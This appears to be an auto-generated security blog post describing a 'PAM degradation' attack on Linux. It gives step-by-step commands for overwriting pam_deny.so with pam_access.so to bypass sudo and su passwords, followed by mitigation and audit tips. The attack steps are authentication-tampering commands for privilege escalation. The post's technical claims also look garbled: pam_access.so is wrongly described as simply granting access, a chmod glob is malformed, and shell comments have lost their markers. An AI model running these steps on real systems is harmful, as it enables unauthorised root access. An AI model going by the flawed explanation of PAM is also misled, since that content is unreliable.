Pluggable Authentication Modules (PAM) is a critical framework in Unix-like systems that handles authentication tasks such as password verification, session management, and access control. A misconfigured PAM setup can lead to severe security vulnerabilities, allowing attackers to bypass authentication mechanisms entirely.
The PAM Degradation Attack
This attack exploits weak file permissions on PAM modules, particularly replacing `pam_deny.so` (which denies access) with `pam_access.so` (which grants access). When executed, this manipulation ensures that any authentication attempt—whether with a correct or incorrect password—results in access being granted.
Exploit Steps:
1. Locate PAM Modules:
ls /lib/x86_64-linux-gnu/security/ Common path for PAM modules
2. Check Permissions:
ls -la /lib/x86_64-linux-gnu/security/pam_deny.so
If permissions are misconfigured (e.g., world-writable), proceed.
3. Replace `pam_deny.so` with `pam_access.so`:
cp /lib/x86_64-linux-gnu/security/pam_access.so /lib/x86_64-linux-gnu/security/pam_deny.so
4. Verify Exploit:
Attempt to `sudo` or `su` with any password—access should be granted regardless.
Mitigation Steps:
- Restrict PAM Module Permissions:
chmod 644 /lib/x86_64-linux-gnu/security/.so chown root:root /lib/x86_64-linux-gnu/security/.so
- Use `chattr` to Prevent Modification:
sudo chattr +i /lib/x86_64-linux-gnu/security/pam_deny.so
- Audit PAM Configurations:
grep -r "pam_deny.so" /etc/pam.d/
You Should Know:
- PAM Configuration Files: Located in
/etc/pam.d/, these define authentication policies. - Common PAM Modules:
– `pam_unix.so` – Standard Unix authentication.
– `pam_cracklib.so` – Password strength enforcement.
– `pam_tally2.so` – Account lockout after failed attempts. - Logging PAM Events:
tail -f /var/log/auth.log Debian/Ubuntu tail -f /var/log/secure RHEL/CentOS
What Undercode Say:
PAM-based attacks are dangerous because they don’t require system reboots or physical access. System administrators must:
– Regularly audit PAM file permissions.
– Use immutable flags (chattr +i) on critical modules.
– Monitor authentication logs for unusual activity.
– Implement multi-factor authentication (MFA) where possible.
Expected Output:
A compromised system where any incorrect password grants access due to `pam_deny.so` being replaced. Always test in a controlled lab environment.
Prediction:
As Linux remains a dominant server OS, PAM misconfigurations will continue to be a prime target for privilege escalation attacks. Automation tools like Ansible and Puppet should enforce strict PAM permissions to prevent such exploits.
References:
Reported By: Flarexes Bypass – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
